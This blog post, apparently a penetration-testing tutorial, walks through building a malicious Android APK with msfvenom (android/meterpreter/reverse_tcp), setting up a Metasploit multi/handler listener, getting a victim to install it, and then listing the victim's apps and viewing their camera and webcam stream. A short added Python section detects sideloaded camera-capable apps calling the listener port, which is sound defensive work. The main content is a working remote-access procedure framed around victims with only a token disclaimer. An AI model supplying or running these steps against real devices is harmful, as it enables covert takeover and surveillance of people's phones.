Welcome to this series of blog posts on Android penetration testing. Today we will look at how to hack any Android device. There are several techniques for doing this; in this post we will learn how the Metasploit framework helps. This content is exclusively for educational purposes. Don't use this technique for illegal activities.
System with Windows/Linux/Mac OS
For now we do this in our local environment; it can also be done globally using the port forwarding technique.
How can we hack any Android mobile device using MSFvenom and the Metasploit framework? Here, we will use MSFvenom to generate a payload APK file and set up a listener in the Metasploit framework, through which we can access the victim device.
For those who don't know what Metasploit is: Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, choose what payload to drop, and hit Enter.
First, we will create a malicious APK file using MSFvenom, which helps us access and take control of a device. Let's do it.
To make the malicious APK file, we will use the command:
→ msfvenom -p android/meterpreter/reverse_tcp LHOST=Yourserverip LPORT=setport4444 R> Myfake.apk
As the picture above shows, we have now successfully created our payload for shell execution.
Here, -p refers to the payload. Always make sure to set your local host server IP. Now, open the Metasploit framework by typing the command
We have now successfully launched the Metasploit framework. You can also open it manually; it comes by default with Kali Linux.
Now we will use the Metasploit msfconsole, which contains various exploits and modules for Android devices. To set up the listener, we will use multi/handler by typing the command:
→ use exploit/multi/handler
Next, we need to set the meterpreter/reverse_tcp payload for the listener. Here we will use the command:
→ set payload android/meterpreter/reverse_tcp
Then we need to set LHOST. To find your LHOST, type ifconfig in your terminal.
Here we will set LHOST by typing the command:
→ set LHOST
Then set LPORT by typing the command:
→ set LPORT 4444
Up to this point we have set up our malicious APK. It is now ready to send to your victim, and you can manipulate the user's device from your msfconsole session.
Now for the next step: install the application that we created using MSFvenom.
As the picture above shows, we have installed the malicious application that we created.
Now, navigate to your msfconsole and gain access to the victim device by typing the command:
As the picture above shows, we were able to gain access to our target Android device, and we have successfully started a Meterpreter session.
Now, use the help command to see the available functionality.
Now, check all the applications available on our target Android device. This shows all the application packages and application names on the target device.
Here we will use the command:
Now, we can access the victim's camera by typing the command:
As the picture above shows, we can access the victim's camera from msfconsole. To access the victim's webcam stream, we will use the command:
As the picture above shows, the victim's webcam live stream will open in our browser if the victim is running the webcam stream.
So we have successfully gained control of our target device using the Metasploit framework.
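Seen from the defender's side, the procedure above leaves two traces: an app installed from outside the store that can use the camera and the network, and an outbound connection to the listener port. The following added example (not from the original post) correlates the two. The inventory and flow-log formats, the package names and the addresses are constructed assumptions.

```python
import csv
import io

PLAY_STORE = "com.android.vending"   # Google Play's installer package name
WATCHED = {"android.permission.CAMERA", "android.permission.INTERNET"}
HANDLER_PORT = 4444                  # LPORT used in the post; an operator can pick another

# Constructed inventory in a hypothetical MDM export format:
# package, installer package (empty = installed from a file), permissions.
INVENTORY = """package,installer,permissions
com.example.notes,com.android.vending,android.permission.INTERNET
com.example.fake,,android.permission.CAMERA;android.permission.INTERNET;android.permission.RECORD_AUDIO
com.example.camera,com.android.vending,android.permission.CAMERA;android.permission.INTERNET
"""

# Constructed egress records, one per line: "<package> <dst_ip>:<dst_port>".
FLOWS = """com.example.notes 203.0.113.10:443
com.example.fake 192.0.2.50:4444
com.example.camera 203.0.113.20:443
"""

def sideloaded_with_camera(inventory_csv):
    """Apps not installed by the store that hold every watched permission."""
    hits = {}
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        perms = {p for p in row["permissions"].split(";") if p}
        if row["installer"] != PLAY_STORE and WATCHED <= perms:
            hits[row["package"]] = sorted(perms)
    return hits

def flows_to_port(flow_log, port=HANDLER_PORT):
    """Map package -> destinations contacted on the given port."""
    out = {}
    for line in flow_log.splitlines():
        if not line.strip():
            continue
        package, dst = line.split()
        if int(dst.rpartition(":")[2]) == port:
            out.setdefault(package, []).append(dst)
    return out

def triage(inventory_csv, flow_log):
    """Sideloaded camera-capable apps, raised to 'high' if they also call the port."""
    risky, flows = sideloaded_with_camera(inventory_csv), flows_to_port(flow_log)
    return [{"package": p, "permissions": risky[p], "flows": flows.get(p, []),
             "severity": "high" if p in flows else "review"} for p in sorted(risky)]

if __name__ == "__main__":
    for finding in triage(INVENTORY, FLOWS):
        print(finding)
```

Because the port is configurable, the inventory check is the more durable signal; the port match only raises the priority of a finding.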
Download Metasploit : https://www.metasploit.com/
Author: Pallab Jyoti Borah, VAPT Security Analyst